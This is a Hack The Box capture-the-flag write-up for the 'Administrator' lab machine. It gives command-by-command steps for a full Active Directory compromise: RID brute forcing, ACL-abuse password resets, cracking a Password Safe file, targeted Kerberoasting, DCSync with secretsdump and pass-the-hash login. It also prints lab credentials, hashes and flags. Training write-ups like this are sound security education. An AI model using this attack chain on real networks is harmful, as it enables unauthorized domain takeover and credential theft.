// htb writeup Hack The Box 2026-02-25
Administrator
HackTheBox Medium Hack The Box
Active Directory Privilege Escalation Password Cracking
root obtained // PWNED

CTF Writeup - Administrator (Hack The Box)

🧪 Machine Details


🧭 Summary

This box simulates a realistic domain environment with multiple users and privilege escalation paths. You’re provided with initial low-privileged credentials (Olivia:ichliebedich) and work your way up to a full domain compromise. Key highlights include using ACL misconfigurations to reset passwords, enumerating FTP for secrets, cracking a password manager file with john, leveraging BloodHound for access control visualization, and executing a targeted Kerberoasting attack to capture a service account hash with DCSync rights for full domain admin access.


🔍 Enumeration

🔎 Nmap Scan

nmap -p- administrator.htb --min-rate 10000
nmap -p 21,53,88,... -sCV administrator.htb -oN nmapscan

Revealed common AD services: FTP, SMB, LDAP, Kerberos, WinRM.


🔑 Initial Access

You start with credentials:

Username: Olivia
Password: ichliebedich
nxc smb administrator.htb -u Olivia -p ichliebedich
nxc winrm administrator.htb -u Olivia -p ichliebedich

👥 User Enumeration

Enumerated RID brute forcing with nxc:

nxc smb administrator.htb -u Olivia -p ichliebedich --rid-brute | grep SidTypeUser

Collected users: michael, benjamin, emily, ethan, alexander, emma, etc.


🕸️ BloodHound AD Enumeration

bloodhound-python -u Olivia -p ichliebedich -d administrator.htb -ns 10.10.11.42 -c All

Olivia has GenericAll over michael → reset his password
Michael has password reset rights on benjamin → reset again

bloodyAD -u olivia ... set password Michael ...
bloodyAD -u Michael ... set password Benjamin ...

🔐 FTP + Credential Recovery

nxc ftp administrator.htb -u Benjamin -p Password123
ftp> get Backup.psafe3

Converted to john hash:

pwsafe2john Backup.psafe3 > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Cracked password: tekieromucho

Used PasswordSafe GUI to reveal:


🧑‍💻 User Shell

evil-winrm -i administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb

Captured user.txt:

4d479030c20afac8ee4ad1b7757959a6

🧬 Kerberoasting → DCSync

Emily has GenericWrite over ethan

python targetedKerberoast.py -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb ...

Time sync fix:

sudo rdate -n administrator.htb

Password recovered: limpbizkit


🧰 SecretsDump to Domain Admin

impacket-secretsdump administrator.htb/ethan:limpbizkit@dc.administrator.htb

Captured NTLM hash for Administrator:

3dc553ce4b9fd20bd016e098d2d2fd2e

Logged in as Administrator:

evil-winrm -i administrator.htb -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e

Got root.txt:

66cd2c404066adec0d050d2610a64c36

🧠 Lessons Learned


✍️ Writeup by inksec
🔗 https://github.com/inkedqt